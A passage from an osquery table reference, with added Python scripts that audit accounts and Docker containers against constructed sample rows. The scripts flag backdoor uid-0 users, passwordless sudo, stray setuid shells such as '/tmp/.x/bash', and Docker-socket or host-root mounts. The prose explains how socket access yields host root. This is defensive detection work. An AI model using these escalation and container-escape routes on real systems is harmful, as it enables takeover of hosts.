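    ("/usr/bin/find",   "root", "S"),
    ("/tmp/.x/bash",    "root", "S"),
]
SUDOERS = [
    ("/etc/sudoers",          "%sudo",  "ALL=(ALL:ALL) ALL"),
    ("/etc/sudoers.d/deploy", "deploy", "ALL=(ALL) NOPASSWD: ALL"),
    ("/etc/sudoers.d/ops",    "alice",  "ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx"),
]

# Assumed distribution baseline of setuid binaries; anything outside it is reported.
KNOWN_SUID = ("/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/newgrp")


def load(conn, table, columns, rows):
    """Create a mirror table named like osquery's and bulk-insert the rows."""
    conn.execute(f"CREATE TABLE {table} ({', '.join(columns)})")
    conn.executemany(f"INSERT INTO {table} VALUES ({','.join('?' * len(columns))})", rows)


def build_db():
    conn = sqlite3.connect(":memory:")
    load(conn, "users", ("uid", "gid", "username", "directory", "shell"), USERS)
    load(conn, "shadow", ("username", "password_status", "hash_alg"), SHADOW)
    load(conn, "user_ssh_keys", ("uid", "path", "encrypted", "key_type"), USER_SSH_KEYS)
    load(conn, "suid_bin", ("path", "username", "permissions"), SUID_BIN)
    load(conn, "sudoers", ("source", "header", "rule_details"), SUDOERS)
    return conn


def audit_accounts(conn, known_suid=KNOWN_SUID):
    """Run each check and return its rows, keyed by finding name."""
    def rows(sql, params=()):
        return conn.execute(sql, params).fetchall()

    return {
        # A second uid-0 account is a classic persistence backdoor.
        "uid0_aliases": [r[0] for r in rows(
            "SELECT username FROM users WHERE uid = 0 AND username != 'root' ORDER BY username")],
        # Empty password on an account that can actually log in (has a real shell).
        "empty_passwords": [r[0] for r in rows(
            "SELECT s.username FROM shadow s JOIN users u ON u.username = s.username "
            "WHERE s.password_status = 'empty' AND u.shell NOT LIKE '%nologin' "
            "AND u.shell != '/bin/false' ORDER BY s.username")],
        # Private keys without a passphrase are directly reusable if the home dir leaks.
        "plaintext_keys": rows(
            "SELECT u.username, k.path FROM user_ssh_keys k JOIN users u ON u.uid = k.uid "
            "WHERE k.encrypted = 0 ORDER BY k.path"),
        # Passwordless sudo to ALL: any code running as that user is root.
        "nopasswd_all": rows(
            "SELECT source, header FROM sudoers WHERE rule_details LIKE '%NOPASSWD:%ALL' "
            "ORDER BY source"),
        # setuid binaries that are not part of the expected baseline.
        "unexpected_suid": [r[0] for r in rows(
            f"SELECT path FROM suid_bin WHERE path NOT IN ({','.join('?' * len(known_suid))}) "
            "ORDER BY path", tuple(known_suid))],
    }


if __name__ == "__main__":
    for finding, items in audit_accounts(build_db()).items():
        print(finding, items)
```

On a real agent the `shadow` table only returns rows when osquery runs as root, and `suid_bin` only walks the common binary directories, so a setuid copy dropped somewhere unusual is better caught by the file-event tables than by this inventory query.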

d. Container information

docker_container_envs

Docker container environment variables

Field Type Description
id TEXT Container ID
key TEXT Environment variable name
value TEXT Environment variable value

docker_container_fs_changes

Changes to files or directories on a container's filesystem

Field Type Description
id TEXT Container ID
path TEXT File or directory path relative to rootfs
change_type TEXT Type of change: C:Modified, A:Added, D:Deleted

docker_container_labels

Docker container labels

Field Type Description
id TEXT Container ID
key TEXT Label key
value TEXT Optional label value

docker_container_mounts

Docker container mounts

Field Type Description
id TEXT Container ID
type TEXT Type of mount (bind, volume)
name TEXT Optional mount name
source TEXT Source path on host
destination TEXT Destination path inside container
driver TEXT Driver providing the mount
mode TEXT Mount options (rw, ro)
rw INTEGER 1 if read/write. 0 otherwise
propagation TEXT Mount propagation

docker_container_networks

Docker container networks

Field Type Description
id TEXT Container ID
name TEXT Network name
network_id TEXT Network ID
endpoint_id TEXT Endpoint ID
gateway TEXT Gateway
ip_address TEXT IP address
ip_prefix_len INTEGER IP subnet prefix length
ipv6_gateway TEXT IPv6 gateway
ipv6_address TEXT IPv6 address
ipv6_prefix_len INTEGER IPv6 subnet prefix length
mac_address TEXT MAC address

docker_container_ports

Docker container ports

Field Type Description
id TEXT Container ID
type TEXT Protocol (tcp, udp)
port INTEGER Port inside the container
host_ip TEXT Host IP address on which public port is listening
host_port INTEGER Host port

docker_container_processes

Docker container processes

Field Type Description
id TEXT Container ID
pid BIGINT Process ID
name TEXT The process path or shorthand argv[0]
cmdline TEXT Complete argv
state TEXT Process state
uid BIGINT User ID
gid BIGINT Group ID
euid BIGINT Effective user ID
egid BIGINT Effective group ID
suid BIGINT Saved user ID
sgid BIGINT Saved group ID
wired_size BIGINT Bytes of unpageable memory used by process
resident_size BIGINT Bytes of private memory used by process
total_size BIGINT Total virtual memory size
start_time BIGINT Process start in seconds since boot (non-sleeping)
parent BIGINT Process parent’s PID
pgroup BIGINT Process group
threads INTEGER Number of threads used by process
nice INTEGER Process nice level (-20 to 20, default 0)
user TEXT User name
time TEXT Cumulative CPU time. [DD-]HH:MM:SS format
cpu DOUBLE CPU utilization as percentage
mem DOUBLE Memory utilization as percentage

docker_container_stats

Docker container statistics. Queries on this table take at least one second.

Field Type Description
id TEXT Container ID
name TEXT Container name
pids INTEGER Number of processes
read BIGINT UNIX time when stats were read
preread BIGINT UNIX time when stats were last read
interval BIGINT Difference between read and preread in nano-seconds
disk_read BIGINT Total disk read bytes
disk_write BIGINT Total disk write bytes
num_procs INTEGER Number of processors
cpu_total_usage BIGINT Total CPU usage
cpu_kernelmode_usage BIGINT CPU kernel mode usage
cpu_usermode_usage BIGINT CPU user mode usage
system_cpu_usage BIGINT CPU system usage
online_cpus INTEGER Online CPUs
pre_cpu_total_usage BIGINT Last read total CPU usage
pre_cpu_kernelmode_usage BIGINT Last read CPU kernel mode usage
pre_cpu_usermode_usage BIGINT Last read CPU user mode usage
pre_system_cpu_usage BIGINT Last read CPU system usage
pre_online_cpus INTEGER Last read online CPUs
memory_usage BIGINT Memory usage
memory_max_usage BIGINT Memory maximum usage
memory_limit BIGINT Memory limit
network_rx_bytes BIGINT Total network bytes read
network_tx_bytes BIGINT Total network bytes transmitted

docker_containers

Docker container information

Field Type Description
id TEXT Container ID
name TEXT Container name
image TEXT Docker image (name) used to launch this container
image_id TEXT Docker image ID
command TEXT Command with arguments
created BIGINT Time of creation as UNIX time
state TEXT Container state (created, restarting, running, removing, paused, exited, dead)
status TEXT Container status information
pid BIGINT Identifier of the initial process
path TEXT Container path
config_entrypoint TEXT Container entrypoint(s)
started_at TEXT Container start time as string
finished_at TEXT Container finish time as string
privileged INTEGER Is the container privileged
security_options TEXT List of container security options
env_variables TEXT Container environmental variables
readonly_rootfs INTEGER Is the root filesystem mounted as read only
cgroup_namespace TEXT cgroup namespace
ipc_namespace TEXT IPC namespace
mnt_namespace TEXT Mount namespace
net_namespace TEXT Network namespace
pid_namespace TEXT PID namespace
user_namespace TEXT User namespace
uts_namespace TEXT UTS namespace

docker_image_history

Docker image history

Field Type Description
id TEXT Image ID
created BIGINT Time of creation as UNIX time
size BIGINT Size of instruction in bytes
created_by TEXT Created by instruction
tags TEXT Comma-separated list of tags
comment TEXT Instruction comment

docker_image_labels

Docker image labels

Field Type Description
id TEXT Image ID
key TEXT Label key
value TEXT Optional label value

docker_image_layers

Docker image layer information

Field Type Description
id TEXT Image ID
layer_id TEXT Layer ID
layer_order INTEGER Layer Order (1 = base layer)

docker_images

Docker image information

Field Type Description
id TEXT Image ID
created BIGINT Time of creation as UNIX time
size_bytes BIGINT Size of image in bytes
tags TEXT Comma-separated list of repository tags

docker_info

Docker system information

Field Type Description
id TEXT Docker system ID
containers INTEGER Total number of containers
containers_running INTEGER Number of containers currently running
containers_paused INTEGER Number of containers in paused state
containers_stopped INTEGER Number of containers in stopped state
images INTEGER Number of images
storage_driver TEXT Storage driver
memory_limit INTEGER 1 if memory limit support is enabled. 0 otherwise
swap_limit INTEGER 1 if swap limit support is enabled. 0 otherwise
kernel_memory INTEGER 1 if kernel memory limit support is enabled. 0 otherwise
cpu_cfs_period INTEGER 1 if CPU Completely Fair Scheduler (CFS) period support is enabled. 0 otherwise
cpu_cfs_quota INTEGER 1 if CPU Completely Fair Scheduler (CFS) quota support is enabled. 0 otherwise
cpu_shares INTEGER 1 if CPU share weighting support is enabled. 0 otherwise
cpu_set INTEGER 1 if CPU set selection support is enabled. 0 otherwise
ipv4_forwarding INTEGER 1 if IPv4 forwarding is enabled. 0 otherwise
bridge_nf_iptables INTEGER 1 if bridge netfilter iptables is enabled. 0 otherwise
bridge_nf_ip6tables INTEGER 1 if bridge netfilter ip6tables is enabled. 0 otherwise
oom_kill_disable INTEGER 1 if Out-of-memory kill is disabled. 0 otherwise
logging_driver TEXT Logging driver
cgroup_driver TEXT Control groups driver
kernel_version TEXT Kernel version
os TEXT Operating system
os_type TEXT Operating system type
architecture TEXT Hardware architecture
cpus INTEGER Number of CPUs
memory BIGINT Total memory
http_proxy TEXT HTTP proxy
https_proxy TEXT HTTPS proxy
no_proxy TEXT Comma-separated list of domain extensions proxy should not be used for
name TEXT Name of the docker host
server_version TEXT Server version
root_dir TEXT Docker root directory

docker_network_labels

Docker network labels

Field Type Description
id TEXT Network ID
key TEXT Label key
value TEXT Optional label value

docker_networks

Docker network information

Field Type Description
id TEXT Network ID
name TEXT Network name
driver TEXT Network driver
created BIGINT Time of creation as UNIX time
enable_ipv6 INTEGER 1 if IPv6 is enabled on this network. 0 otherwise
subnet TEXT Network subnet
gateway TEXT Network gateway

docker_version

Docker version information

Field Type Description
version TEXT Docker version
api_version TEXT API version
min_api_version TEXT Minimum API version supported
git_commit TEXT Docker build git commit
go_version TEXT Go version
os TEXT Operating system
arch TEXT Hardware architecture
kernel_version TEXT Kernel version
build_time TEXT Build time

docker_volume_labels

Docker volume labels

Field Type Description
name TEXT Volume name
key TEXT Label key
value TEXT Optional label value

docker_volumes

Docker volume information

Field Type Description
name TEXT Volume name
driver TEXT Volume driver
mount_point TEXT Mount point
type TEXT Volume type
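The `docker_containers` (`privileged`, `security_options`, `readonly_rootfs`), `docker_container_mounts` (`source`, `rw`) and `docker_container_ports` (`host_ip`) columns above are enough to spot the usual container-escape and exposure misconfigurations from the host side. The added example below (not osquery code) mirrors those columns into SQLite with constructed rows and runs the checks; the container rows, the `SENSITIVE_HOST_PATHS` list and the `audit_containers` function are assumptions. The SELECTs run unchanged in `osqueryi` on a host where osquery can reach the Docker socket.

```python
"""Flag risky container configuration from the docker_* osquery tables.

Added example, not osquery code: in-memory SQLite mirrors of a subset of the
docker_containers, docker_container_mounts and docker_container_ports columns,
filled with constructed rows (ids shortened for readability; no real hosts).
"""
import sqlite3

# id, name, image, privileged, security_options, readonly_rootfs
CONTAINERS = [
    ("c1", "web",       "nginx:1.25",    0, "no-new-privileges",  1),
    ("c2", "ci-runner", "runner:latest", 1, "",                   0),
    ("c3", "agent",     "monitor:2.0",   0, "",                   0),
    ("c4", "db",        "postgres:15",   0, "seccomp=unconfined", 0),
]
# id, type, source, destination, rw
MOUNTS = [
    ("c1", "bind",   "/srv/www",                         "/usr/share/nginx/html",    0),
    ("c3", "bind",   "/var/run/docker.sock",             "/var/run/docker.sock",     1),
    ("c3", "bind",   "/",                                "/host",                    1),
    ("c4", "volume", "/var/lib/docker/volumes/pg/_data", "/var/lib/postgresql/data", 1),
]
# id, type, port, host_ip, host_port
PORTS = [
    ("c1", "tcp", 80,   "0.0.0.0",   8080),
    ("c3", "tcp", 9100, "127.0.0.1", 9100),
    ("c4", "tcp", 5432, "0.0.0.0",   5432),
]

# Host paths that give a container root-equivalent control of the host (assumed list).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/proc", "/sys", "/root",
                        "/var/run/docker.sock", "/run/docker.sock")


def load(conn, table, columns, rows):
    """Create a mirror table named like osquery's and bulk-insert the rows."""
    conn.execute(f"CREATE TABLE {table} ({', '.join(columns)})")
    conn.executemany(f"INSERT INTO {table} VALUES ({','.join('?' * len(columns))})", rows)


def build_db():
    conn = sqlite3.connect(":memory:")
    load(conn, "docker_containers",
         ("id", "name", "image", "privileged", "security_options", "readonly_rootfs"), CONTAINERS)
    load(conn, "docker_container_mounts", ("id", "type", "source", "destination", "rw"), MOUNTS)
    load(conn, "docker_container_ports", ("id", "type", "port", "host_ip", "host_port"), PORTS)
    return conn


def audit_containers(conn, sensitive=SENSITIVE_HOST_PATHS):
    """Run each check and return its rows, keyed by finding name."""
    def rows(sql, params=()):
        return conn.execute(sql, params).fetchall()

    marks = ",".join("?" * len(sensitive))
    return {
        # --privileged disables most of the isolation; a breakout is a formality.
        "privileged": [r[0] for r in rows(
            "SELECT name FROM docker_containers WHERE privileged = 1 ORDER BY name")],
        # seccomp/apparmor switched off shows up as '...=unconfined' in security_options.
        "unconfined": [r[0] for r in rows(
            "SELECT name FROM docker_containers WHERE security_options LIKE '%unconfined%' "
            "ORDER BY name")],
        # Host root or the Docker socket mounted inside a container.
        "sensitive_mounts": rows(
            "SELECT c.name, m.source, m.destination, m.rw FROM docker_container_mounts m "
            "JOIN docker_containers c ON c.id = m.id "
            f"WHERE m.source IN ({marks}) ORDER BY c.name, m.source", tuple(sensitive)),
        # Ports published on every host interface rather than loopback.
        "wildcard_published": rows(
            "SELECT c.name, p.host_port, p.port FROM docker_container_ports p "
            "JOIN docker_containers c ON c.id = p.id "
            "WHERE p.host_ip IN ('0.0.0.0', '::') ORDER BY p.host_port"),
        # A writable root filesystem lets an intruder persist tooling inside the container.
        "writable_rootfs": [r[0] for r in rows(
            "SELECT name FROM docker_containers WHERE readonly_rootfs = 0 ORDER BY name")],
    }


if __name__ == "__main__":
    for finding, items in audit_containers(build_db()).items():
        print(finding, items)
```

A bind mount of `/var/run/docker.sock` deserves the same severity as `privileged = 1`: whoever can talk to the socket can start a new privileged container with the host root mounted, so the check treats the socket path as a sensitive host path rather than as an ordinary mount.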

e. Network information

arp_cache

Address resolution cache, both static and dynamic (from ARP, NDP)

Field Type Description
address TEXT IPv4 address target
mac TEXT MAC address of broadcasted address
interface TEXT Interface of the network for the MAC
permanent TEXT 1 for true, 0 for false

dns_resolvers

Resolvers used by the host

Field Type Description
id INTEGER Address type index or order
type TEXT Address type: sortlist, nameserver, search
address TEXT Resolver IP/IPv6 address
netmask TEXT Address (sortlist) netmask length
options BIGINT Resolver options
pid_with_namespace INTEGER Pids that contain a namespace

interface_addresses

Network interfaces and related metadata

Field Type Description
interface TEXT Interface name
address TEXT Specific address for interface
mask TEXT Interface netmask
broadcast TEXT Broadcast address for the interface
point_to_point TEXT PtP address for the interface
type TEXT Type of address. One of dhcp, manual, auto, other, unknown
friendly_name TEXT The friendly display name of the interface.

interface_details

Detailed information and statistics for network interfaces

Field Type Description
interface TEXT Interface name
mac TEXT MAC of interface (optional)
type INTEGER Interface type (includes virtual)
mtu INTEGER Network MTU
metric INTEGER Metric based on the speed of the interface
flags INTEGER Flags (netdevice) for the device
ipackets BIGINT Input packets
opackets BIGINT Output packets
ibytes BIGINT Input bytes
obytes BIGINT Output bytes
ierrors BIGINT Input errors
oerrors BIGINT Output errors
idrops BIGINT Input drops
odrops BIGINT Output drops
collisions BIGINT Packet Collisions detected
last_change BIGINT Time of last device modification (optional)
link_speed BIGINT Interface speed in Mb/s
pci_slot TEXT PCI slot number
friendly_name TEXT The friendly display name of the interface.
description TEXT Short description of the object a one-line string.
manufacturer TEXT Name of the network adapter’s manufacturer.
connection_id TEXT Name of the network connection as it appears in the Network Connections Control Panel program.
connection_status TEXT State of the network adapter connection to the network.
enabled INTEGER Indicates whether the adapter is enabled or not.
physical_adapter INTEGER Indicates whether the adapter is a physical or a logical adapter.
speed INTEGER Estimate of the current bandwidth in bits per second.
service TEXT The name of the service the network adapter uses.
dhcp_enabled INTEGER If TRUE, the dynamic host configuration protocol (DHCP) server automatically assigns an IP address to the computer system when establishing a network connection.
dhcp_lease_expires TEXT Expiration date and time for a leased IP address that was assigned to the computer by the dynamic host configuration protocol (DHCP) server.
dhcp_lease_obtained TEXT Date and time the lease was obtained for the IP address assigned to the computer by the dynamic host configuration protocol (DHCP) server.
dhcp_server TEXT IP address of the dynamic host configuration protocol (DHCP) server.
dns_domain TEXT Organization name followed by a period and an extension that indicates the type of organization, such as ‘microsoft.com’.
dns_domain_suffix_search_order TEXT Array of DNS domain suffixes to be appended to the end of host names during name resolution.
dns_host_name TEXT Host name used to identify the local computer for authentication by some utilities.
dns_server_search_order TEXT Array of server IP addresses to be used in querying for DNS servers.

interface_ipv6

IPv6 configuration and statistics of network interfaces

Field Type Description
interface TEXT Interface name
hop_limit INTEGER Current Hop Limit
forwarding_enabled INTEGER Enable IP forwarding
redirect_accept INTEGER Accept ICMP redirect messages
rtadv_accept INTEGER Accept ICMP Router Advertisement

listening_ports

Processes with listening (bound) network sockets/ports

Field Type Description
pid INTEGER Process (or thread) ID
port INTEGER Transport layer port
protocol INTEGER Transport protocol (TCP/UDP)
family INTEGER Network protocol (IPv4, IPv6)
address TEXT Specific address for bind
fd BIGINT Socket file descriptor number
socket BIGINT Socket handle or inode number
path TEXT Path for UNIX domain sockets
net_namespace TEXT The inode number of the network namespace

routes

The host system's active route table

Field Type Description
destination TEXT Destination IP address
netmask INTEGER Netmask length
gateway TEXT Route gateway
source TEXT Route source
flags INTEGER Flags to describe route
interface TEXT Route local interface
mtu INTEGER Maximum Transmission Unit for the route
metric INTEGER Cost of route. Lowest is preferred
type TEXT Type of route
hopcount INTEGER Max hops expected

f. ELF information

elf_dynamic

ELF dynamic section information

Field Type Description
tag INTEGER Tag ID
value INTEGER Tag value
class INTEGER Class (32 or 64)
path TEXT Path to ELF file

elf_info

ELF file information

Field Type Description
class TEXT Class type, 32 or 64bit
abi TEXT OS/ABI identification (EI_OSABI)
abi_version INTEGER ABI version (EI_ABIVERSION)
type TEXT Object file type (e.g. executable, shared object, relocatable)
machine INTEGER Machine type
version INTEGER Object file version
entry BIGINT Entry point address
flags INTEGER ELF header flags
path TEXT Path to ELF file

elf_sections

ELF section information

Field Type Description
name TEXT Section name
type INTEGER Section type
vaddr INTEGER Section virtual address in memory
offset INTEGER Offset of section in file
size INTEGER Size of section
flags TEXT Section attributes
link TEXT Link to other section
align INTEGER Section alignment
path TEXT Path to ELF file

elf_segments

ELF segment (program header) information

Field Type Description
name TEXT Segment type/name
offset INTEGER Segment offset in file
vaddr INTEGER Segment virtual address in memory
psize INTEGER Size of segment in file
msize INTEGER Size of segment in memory
flags TEXT Segment attributes
align INTEGER Segment alignment
path TEXT Path to ELF file

elf_symbols

ELF symbol list

Field Type Description
name TEXT Symbol name
addr INTEGER Symbol address (value)
size INTEGER Size of object
type TEXT Symbol type
binding TEXT Binding type
offset INTEGER Section header table index of the section the symbol is defined in (st_shndx)
table TEXT Table name containing symbol
path TEXT Path to ELF file

g. /etc configuration information

etc_hosts

Line-parsed /etc/hosts

Field Type Description
address TEXT IP address mapping
hostnames TEXT Raw hosts mapping
pid_with_namespace INTEGER Pids that contain a namespace

etc_protocols

Line-parsed /etc/protocols

Field Type Description
name TEXT Protocol name
number INTEGER Protocol number
alias TEXT Protocol alias
comment TEXT Comment with protocol description

etc_services

Line-parsed /etc/services

Field Type Description
name TEXT Service name
port INTEGER Service port number
protocol TEXT Transport protocol (TCP/UDP)
aliases TEXT Optional space separated list of other names for a service
comment TEXT Optional comment for a service

h. File information

file

Interactive filesystem attributes and metadata

Field Type Description
path TEXT Absolute file path
directory TEXT Directory of file(s)
filename TEXT Name portion of file path
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
device BIGINT Device ID (optional)
size BIGINT Size of file in bytes
block_size INTEGER Block size of filesystem
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Last status change time
btime BIGINT (B)irth or (cr)eate time
hard_links INTEGER Number of hard links
symlink INTEGER 1 if the path is a symlink, otherwise 0
type TEXT File status
attributes TEXT File attrib string. See: https://ss64.com/nt/attrib.html
volume_serial TEXT Volume serial number
file_id TEXT file ID
file_version TEXT File version
product_version TEXT File product version
bsd_flags TEXT The BSD file flags (chflags). Possible values: NODUMP, UF_IMMUTABLE, UF_APPEND, OPAQUE, HIDDEN, ARCHIVED, SF_IMMUTABLE, SF_APPEND
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

hash

Filesystem hash data

Field Type Description
path TEXT Must provide a path or directory
directory TEXT Must provide a path or directory
md5 TEXT MD5 hash of provided filesystem data
sha1 TEXT SHA1 hash of provided filesystem data
sha256 TEXT SHA256 hash of provided filesystem data
ssdeep TEXT ssdeep hash of provided filesystem data
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

extended_attributes

Extended attributes of files (similar to Windows ADS)

Field Type Description
path TEXT Absolute file path
directory TEXT Directory of file(s)
key TEXT Name of the value generated from the extended attribute
value TEXT The parsed information from the attribute
base64 INTEGER 1 if the value is base64 encoded else 0

i. Memory information

memory_array_mapped_addresses

Data associated with the address mapping of a physical memory array

Field Type Description
handle TEXT Handle, or instance number, associated with the structure
memory_array_handle TEXT Handle of the memory array associated with this structure
starting_address TEXT Physical starting address, in kilobytes, of a range of memory mapped to physical memory array
ending_address TEXT Physical ending address of last kilobyte of a range of memory mapped to physical memory array
partition_width INTEGER Number of memory devices that form a single row of memory for the address partition of this structure

memory_arrays

Data associated with the collection of memory devices that operate together to form a memory address space

Field Type Description
handle TEXT Handle, or instance number, associated with the array
location TEXT Physical location of the memory array
use TEXT Function for which the array is used
memory_error_correction TEXT Primary hardware error correction or detection method supported
max_capacity INTEGER Maximum capacity of array in gigabytes
memory_error_info_handle TEXT Handle, or instance number, associated with any error that was detected for the array
number_memory_devices INTEGER Number of memory devices on array

memory_device_mapped_addresses

Data associated with the address mapping of a physical memory device

Field Type Description
handle TEXT Handle, or instance number, associated with the structure
memory_device_handle TEXT Handle of the memory device structure associated with this structure
memory_array_mapped_address_handle TEXT Handle of the memory array mapped address to which this device range is mapped to
starting_address TEXT Physical starting address, in kilobytes, of a range of memory mapped to physical memory array
ending_address TEXT Physical ending address of last kilobyte of a range of memory mapped to physical memory array
partition_row_position INTEGER Identifies the position of the referenced memory device in a row of the address partition
interleave_position INTEGER The position of the device in a interleave, i.e. 0 indicates non-interleave, 1 indicates 1st interleave, 2 indicates 2nd interleave, etc.
interleave_data_depth INTEGER The max number of consecutive rows from memory device that are accessed in a single interleave transfer; 0 indicates device is non-interleave

memory_devices

Physical memory device (Type 17) information retrieved from SMBIOS

Field Type Description
handle TEXT Handle, or instance number, associated with the structure in SMBIOS
array_handle TEXT The memory array that the device is attached to
form_factor TEXT Implementation form factor for this memory device
total_width INTEGER Total width, in bits, of this memory device, including any check or error-correction bits
data_width INTEGER Data width, in bits, of this memory device
size INTEGER Size of memory device in Megabyte
set INTEGER Identifies if memory device is one of a set of devices. A value of 0 indicates no set affiliation.
device_locator TEXT String number of the string that identifies the physically-labeled socket or board position where the memory device is located
bank_locator TEXT String number of the string that identifies the physically-labeled bank where the memory device is located
memory_type TEXT Type of memory used
memory_type_details TEXT Additional details for memory device
max_speed INTEGER Max speed of memory device in megatransfers per second (MT/s)
configured_clock_speed INTEGER Configured speed of memory device in megatransfers per second (MT/s)
manufacturer TEXT Manufacturer ID string
serial_number TEXT Serial number of memory device
asset_tag TEXT Manufacturer specific asset tag of memory device
part_number TEXT Manufacturer specific part number of memory device
min_voltage INTEGER Minimum operating voltage of device in millivolts
max_voltage INTEGER Maximum operating voltage of device in millivolts
configured_voltage INTEGER Configured operating voltage of device in millivolts

memory_error_info

Data associated with physical memory array errors

Field Type Description
handle TEXT Handle, or instance number, associated with the structure
error_type TEXT type of error associated with current error status for array or device
error_granularity TEXT Granularity to which the error can be resolved
error_operation TEXT Memory access operation that caused the error
vendor_syndrome TEXT Vendor specific ECC syndrome or CRC data associated with the erroneous access
memory_array_error_address TEXT 32 bit physical address of the error based on the addressing of the bus to which the memory array is connected
device_error_address TEXT 32 bit physical address of the error relative to the start of the failing memory device, in bytes
error_resolution TEXT Range, in bytes, within which this error can be determined, when an error address is given

memory_info

Main memory information in bytes

Field Type Description
memory_total BIGINT Total amount of physical RAM, in bytes
memory_free BIGINT The amount of physical RAM, in bytes, left unused by the system
buffers BIGINT The amount of physical RAM, in bytes, used for file buffers
cached BIGINT The amount of physical RAM, in bytes, used as cache memory
swap_cached BIGINT The amount of swap, in bytes, used as cache memory
active BIGINT The total amount of buffer or page cache memory, in bytes, that is in active use
inactive BIGINT The total amount of buffer or page cache memory, in bytes, that are free and available
swap_total BIGINT The total amount of swap available, in bytes
swap_free BIGINT The total amount of swap free, in bytes

memory_map

OS memory region map

Field Type Description
name TEXT Region name
start TEXT Start address of memory region
end TEXT End address of memory region

shared_memory

OS shared memory regions

Field Type Description
shmid INTEGER Shared memory segment ID
owner_uid BIGINT User ID of owning process
creator_uid BIGINT User ID of creator process
pid BIGINT Process ID to last use the segment
creator_pid BIGINT Process ID that created the segment
atime BIGINT Attached time
dtime BIGINT Detached time
ctime BIGINT Changed time
permissions TEXT Memory segment permissions
size BIGINT Size in bytes
attached INTEGER Number of attached processes
status TEXT Destination/attach status
locked INTEGER 1 if segment is locked else 0

j. Process information

process_envs

A key/value table of environment variables for each process

Field Type Description
pid INTEGER Process (or thread) ID
key TEXT Environment variable name
value TEXT Environment variable value

process_memory_map

Process memory mapped files and pseudo devices/regions

Field Type Description
pid INTEGER Process (or thread) ID
start TEXT Virtual start address (hex)
end TEXT Virtual end address (hex)
permissions TEXT r=read, w=write, x=execute, p=private (cow)
offset BIGINT Offset into mapped path
device TEXT MA:MI Major/minor device ID
inode INTEGER Mapped path inode, 0 means uninitialized (BSS)
path TEXT Path to mapped file or mapped type
pseudo INTEGER 1 If path is a pseudo path, else 0

process_namespaces

Linux namespaces of processes running on the host system

Field Type Description
pid INTEGER Process (or thread) ID
cgroup_namespace TEXT cgroup namespace inode
ipc_namespace TEXT ipc namespace inode
mnt_namespace TEXT mnt namespace inode
net_namespace TEXT net namespace inode
pid_namespace TEXT pid namespace inode
user_namespace TEXT user namespace inode
uts_namespace TEXT uts namespace inode

process_open_files

File descriptors for each process

Field Type Description
pid BIGINT Process (or thread) ID
fd BIGINT Process-specific file descriptor number
path TEXT Filesystem path of descriptor

process_open_pipes

Pipes and partner processes for each process

Field Type Description
pid BIGINT Process ID
fd BIGINT File descriptor
mode TEXT Pipe open mode (r/w)
inode BIGINT Pipe inode number
type TEXT Pipe Type: named vs unnamed/anonymous
partner_pid BIGINT Process ID of partner process sharing a particular pipe
partner_fd BIGINT File descriptor of shared pipe at partner’s end
partner_mode TEXT Mode of shared pipe at partner’s end

process_open_sockets

Processes which have open network sockets on the system

Field Type Description
pid INTEGER Process (or thread) ID
fd BIGINT Socket file descriptor number
socket BIGINT Socket handle or inode number
family INTEGER Network protocol (IPv4, IPv6)
protocol INTEGER Transport protocol (TCP/UDP)
local_address TEXT Socket local address
remote_address TEXT Socket remote address
local_port INTEGER Socket local port
remote_port INTEGER Socket remote port
path TEXT For UNIX sockets (family=AF_UNIX), the domain path
state TEXT TCP socket state
net_namespace TEXT The inode number of the network namespace

processes

All running processes on the host system

Field Type Description
pid BIGINT Process (or thread) ID
name TEXT The process path or shorthand argv[0]
path TEXT Path to executed binary
cmdline TEXT Complete argv
state TEXT Process state
cwd TEXT Process current working directory
root TEXT Process virtual root directory
uid BIGINT Unsigned user ID
gid BIGINT Unsigned group ID
euid BIGINT Unsigned effective user ID
egid BIGINT Unsigned effective group ID
suid BIGINT Unsigned saved user ID
sgid BIGINT Unsigned saved group ID
on_disk INTEGER The process path exists yes=1, no=0, unknown=-1
wired_size BIGINT Bytes of unpageable memory used by process
resident_size BIGINT Bytes of private memory used by process
total_size BIGINT Total virtual memory size
user_time BIGINT CPU time in milliseconds spent in user space
system_time BIGINT CPU time in milliseconds spent in kernel space
disk_bytes_read BIGINT Bytes read from disk
disk_bytes_written BIGINT Bytes written to disk
start_time BIGINT Process start time in seconds since Epoch, in case of error -1
parent BIGINT Process parent’s PID
pgroup BIGINT Process group
threads INTEGER Number of threads used by process
nice INTEGER Process nice level (-20 to 19, default 0)
elevated_token INTEGER Process uses elevated token yes=1, no=0
secure_process INTEGER Process is secure (IUM) yes=1, no=0
protection_type TEXT The protection type of the process
virtual_process INTEGER Process is virtual (e.g. System, Registry, vmmem) yes=1, no=0
elapsed_time BIGINT Elapsed time in seconds this process has been running.
handle_count BIGINT Total number of handles that the process has open. This number is the sum of the handles currently opened by each thread in the process.
percent_processor_time BIGINT Returns elapsed time that all of the threads of this process used the processor to execute instructions in 100 nanoseconds ticks.
upid BIGINT A 64bit pid that is never reused. Returns -1 if we couldn’t gather them from the system.
uppid BIGINT The 64bit parent pid that is never reused. Returns -1 if we couldn’t gather them from the system.
cpu_type INTEGER Indicates the specific processor designed for installation.
cpu_subtype INTEGER Indicates the specific processor on which an entry may be used.

k. Security information

apparmor_profiles

Track active AppArmor profiles

Field Type Description
path TEXT Unique, aa-status compatible, policy identifier.
name TEXT Policy name.
attach TEXT Which executable(s) a profile will attach to.
mode TEXT How the policy is applied.
sha1 TEXT A unique hash that identifies this policy

iptables

Linux IP packet filtering and NAT rules

Field Type Description
filter_name TEXT Packet matching filter table name.
chain TEXT Chain the rule belongs to (e.g. INPUT, FORWARD, OUTPUT).
policy TEXT Policy that applies for this rule.
target TEXT Target that applies for this rule.
protocol INTEGER Protocol number identification.
src_port TEXT Protocol source port(s).
dst_port TEXT Protocol destination port(s).
src_ip TEXT Source IP address.
src_mask TEXT Source IP address mask.
iniface TEXT Input interface for the rule.
iniface_mask TEXT Input interface mask for the rule.
dst_ip TEXT Destination IP address.
dst_mask TEXT Destination IP address mask.
outiface TEXT Output interface for the rule.
outiface_mask TEXT Output interface mask for the rule.
match TEXT Matching rule that applies.
packets INTEGER Number of matching packets for this rule.
bytes INTEGER Number of matching bytes for this rule.

secureboot

Secure Boot UEFI settings

